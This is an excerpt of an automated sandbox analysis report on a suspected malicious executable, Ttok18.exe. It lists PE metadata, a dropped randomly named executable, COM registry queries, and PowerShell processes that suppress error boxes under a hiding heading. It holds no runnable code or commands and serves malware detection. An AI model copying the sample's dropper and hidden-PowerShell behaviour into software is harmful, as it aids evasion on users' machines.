            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Ttok18.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Ttok18.exe | Static file information: File size 22020096 > 1048576
            Source: Ttok18.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Ttok18.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb | source: Ttok18.exe
            Source: Ttok18.exe | Static PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.dr | Static PE information: section name: .00cfg
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_029642BD push ebx; ret 4_2_029642DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0296635D push eax; ret 4_2_02966371
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02AD42BD push ebx; ret 8_2_02AD42DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02AD635D push eax; ret 8_2_02AD6371
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02AD2CA5 push 04B80734h; retf 8_2_02AD2D0E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_02AD2C70 push 04B80734h; retf 8_2_02AD2D0E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_071F3BD2 push FFFFFF8Ch; retf 8_2_071F3BD4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_0339E610 push 00000008h; ret 11_2_0339E620
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_0339DA81 push 00000008h; ret 11_2_0339DA90
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.dr | Static PE information: section name: .text entropy: 6.864188260151341
            Source: C:\Users\user\Desktop\Ttok18.exe | File created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Ttok18.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
